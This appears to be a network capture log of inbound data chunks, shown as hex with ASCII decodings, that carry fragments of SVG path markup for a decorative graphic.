                                                                                                                                                                              2023-09-15 05:28:20 UTC6161INData Raw: 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 37 35 2c 32 35 31 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 34 39 2c 32 34 33 2e 36 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39
                                                                                                                                                                              Data Ascii: 22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.75,251.36a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.49,243.64a1.92,1.92,0,0,1-.87,2.49
                                                                                                                                                                              2023-09-15 05:28:20 UTC6177INData Raw: 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 35 33 2e 34 32 2c 32 35 39 2e 35 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d
                                                                                                                                                                              Data Ascii: .13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M653.42,259.54a2.16,2.16,0,0,1-1.1,2.75,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M
                                                                                                                                                                              2023-09-15 05:28:20 UTC6193INData Raw: 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 31 35 2c 33 32 30 2e 36 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20
                                                                                                                                                                              Data Ascii: -4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M688.15,320.61a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9"
                                                                                                                                                                              2023-09-15 05:28:20 UTC6209INData Raw: 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 39 2c 33 38 31 2e 36 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2c 33 37 33 61 32 2e 31 36
                                                                                                                                                                              Data Ascii: ,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M722.89,381.68a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M723,373a2.16
                                                                                                                                                                              2023-09-15 05:28:20 UTC6225INData Raw: 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 36 32 2c 34 34 32 2e 37 36 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 37 2c 34 33 34 2e 30 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c
                                                                                                                                                                              Data Ascii: ,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M757.62,442.76a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M757.7,434.08a2.15,2.15,0,0,1-1.09,2.75,
                                                                                                                                                                              2023-09-15 05:28:20 UTC6241INData Raw: 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 38 2c 32 35 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c
                                                                                                                                                                              Data Ascii: 2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M785.78,252a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,
                                                                                                                                                                              2023-09-15 05:28:20 UTC6257INData Raw: 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 34 34 2c 33 32 31 2e 37 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 35 31 2c 33 31 33 2e 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37
                                                                                                                                                                              Data Ascii: ath class="cls-9" d="M820.44,321.78a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M820.51,313.1a2.15,2.15,0,0,1-1.09,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.7
                                                                                                                                                                              2023-09-15 05:28:20 UTC6273INData Raw: 22 4d 38 35 35 2e 31 37 2c 33 38 32 2e 38 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 35 2e 32 35 2c 33 37 34 2e 31 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c
                                                                                                                                                                              Data Ascii: "M855.17,382.86a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M855.25,374.18a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,
                                                                                                                                                                              2023-09-15 05:28:20 UTC6289INData Raw: 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 39 30 2c 34 33 35 2e 32 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74
                                                                                                                                                                              Data Ascii: .1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.2,2.64,2.64,0,0,1,0,3.57"/><path class="cls-9" d="M890,435.25a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.63,2.63,0,0,1,0,3.57"/><pat
                                                                                                                                                                              2023-09-15 05:28:20 UTC6305INData Raw: 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 38 2e 30 36 2c 32 35 33 2e 32 31 41 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2c 39 31 37 2c 32 35 36 61 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33
                                                                                                                                                                              Data Ascii: 0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M918.06,253.21A2.15,2.15,0,0,1,917,256a3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3
                                                                                                                                                                              2023-09-15 05:28:20 UTC6321INData Raw: 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 35 32 2e 38 2c 33 31 34 2e 32 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39
                                                                                                                                                                              Data Ascii: ,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M952.8,314.28a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9
                                                                                                                                                                              2023-09-15 05:28:20 UTC6337INData Raw: 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 35 38 2c 32 35 31 2e 36 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 32 38 2c 32 34 32 2e 38 35 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30
                                                                                                                                                                              Data Ascii: 2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M59.58,251.63a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M59.28,242.85a2.18,2.18,0,0
                                                                                                                                                                              2023-09-15 05:28:20 UTC6353INData Raw: 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 39 37 2c 33 30 33 2e 30 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d
                                                                                                                                                                              Data Ascii: 8,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M97,303.09a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-
                                                                                                                                                                              2023-09-15 05:28:20 UTC6403INData Raw: 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 35 36 2c 31 31 37 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 32 36 2c 31 30 39 2e 30 35 61 32 2e 31 38 2c 32 2e 31 38 2c
                                                                                                                                                                              Data Ascii: 6,2.86,2.86,0,0,1,3.67,0,2.67,2.67,0,0,1,.19,3.61"/><path class="cls-7" d="M117.56,117.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M117.26,109.05a2.18,2.18,
                                                                                                                                                                              2023-09-15 05:28:20 UTC6419INData Raw: 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2e 33 31 2c 31 37 38 2e 30 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2c 31
                                                                                                                                                                              Data Ascii: 1.2,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155.31,178.08a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.84,2.84,0,0,1,3.66,0,2.67,2.67,0,0,1,.2,3.62"/><path class="cls-7" d="M155,1
                                                                                                                                                                              2023-09-15 05:28:20 UTC6435INData Raw: 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 33 2e 30 37 2c 32 33 38 2e 33 32 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 32 2e 37 37 2c 32 32 39 2e 35 34 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c
                                                                                                                                                                              Data Ascii: 0,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M193.07,238.32a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M192.77,229.54a2.17,2.17,0,0,1-1,2.83,3.18,
                                                                                                                                                                              2023-09-15 05:28:20 UTC6451INData Raw: 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 38 33 2c 32 39 38 2e 35 37 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 35
                                                                                                                                                                              Data Ascii: 1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M230.83,298.57a2.19,2.19,0,0,1-1,2.83,3.2,3.2,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M230.5
